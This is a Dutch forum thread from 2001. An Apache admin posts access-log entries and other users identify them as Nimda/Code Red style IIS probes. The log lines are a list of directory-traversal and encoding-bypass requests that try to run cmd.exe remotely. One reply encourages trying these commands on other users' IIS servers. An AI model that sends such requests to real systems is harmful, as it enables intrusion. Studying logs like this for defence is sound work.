Vage access.log van Apache... poging tot hack?? - Serversoftware en clouddiensten

dinsdag 30 oktober 2001 15:30

Acties:

Topicstarter

Ik zat vanmorgen te loeren richting mijn access.log en zag dit:

code:

62.60.62.154 - - [30/Oct/2001:13:01:24 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
62.60.62.154 - - [30/Oct/2001:13:01:32 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
62.60.62.154 - - [30/Oct/2001:13:01:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
62.60.62.154 - - [30/Oct/2001:13:01:51 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
62.60.62.154 - - [30/Oct/2001:13:02:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
62.60.62.154 - - [30/Oct/2001:13:02:10 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
62.60.62.154 - - [30/Oct/2001:13:02:16 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
62.60.62.154 - - [30/Oct/2001:13:02:21 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
62.60.62.154 - - [30/Oct/2001:13:02:26 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
62.60.62.154 - - [30/Oct/2001:13:02:30 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
62.60.62.154 - - [30/Oct/2001:13:02:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
62.60.62.154 - - [30/Oct/2001:13:02:38 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
62.60.62.154 - - [30/Oct/2001:13:02:41 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
62.60.62.154 - - [30/Oct/2001:13:02:44 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
62.60.62.154 - - [30/Oct/2001:13:02:47 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
62.60.62.154 - - [30/Oct/2001:13:02:50 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

Wat is dit?? Poging tot hacken??

Edit: Of is dit een poging om cmd op te starten?? Lijkt mij dat die lamers denken dat dit een IIS server is ofso... Ben wel dom maar nie zo dom

SysSpec

dinsdag 30 oktober 2001 15:34

Acties:

WarPuppy

Electronic Technology

Das een IIS bug, die ze willen uitvoeren op Apache

dinsdag 30 oktober 2001 15:35

Acties:

lak

Topicstarter

En dat gaat neem ik aan nie werken toch??

SysSpec

dinsdag 30 oktober 2001 15:40

Acties:

jep

Niet echt nee

dinsdag 30 oktober 2001 16:21

Acties:

Zorg

kan iemand ook uitleggen wat ze aan het doen zijn dan? (in globale lijnen, nix illegaals)

Mijn hobby projectjes: www.agenticprojects.be

dinsdag 30 oktober 2001 16:23

Acties:

Bigs

Ze proberen idd wat IIS exploits uit.. sukkels

dinsdag 30 oktober 2001 16:26

Acties:

MikeN

[search=cmd apache]
Tis maar een idee...

dinsdag 30 oktober 2001 16:40

Acties:

Eastern

Bij ons is dat ook. Ik denk dat er veel mensen zijn die 'computer maniak' denken te zijn, en vervolgens w2k installeren met IIS4 of 5. Moet je maar eens proberen zo'n commando bij zo'n gast (op z'n ip nummer) uit te voeren. 80% kans dat het werkt...

dinsdag 30 oktober 2001 18:49

Acties:

Verwijderd

dat is nou nimda... die heb ik elke dag 2309847329 keer in m'n log staan. Irrittant kan ik je melden.

dinsdag 30 oktober 2001 19:32

Acties:

Verwijderd

Ja dat zijn virus aanvallen... zoals Codered en of Nimda of andere.

Ik heb hier een ermm soort stats grabber uit de accesslog files.

http://darkstar.phlex.net/virus/

dinsdag 30 oktober 2001 21:33

Acties:

bekkel

BoEsm Productions

Op dinsdag 30 oktober 2001 18:49 schreef shorty151 het volgende:
dat is nou nimda... die heb ik elke dag 2309847329 keer in m'n log staan. Irrittant kan ik je melden.

das wel erg vaak....
heb er een paar per dag (ip's)
met een regeltje of 15

.........www.raketje.com....................soon.....

dinsdag 30 oktober 2001 21:47

Acties: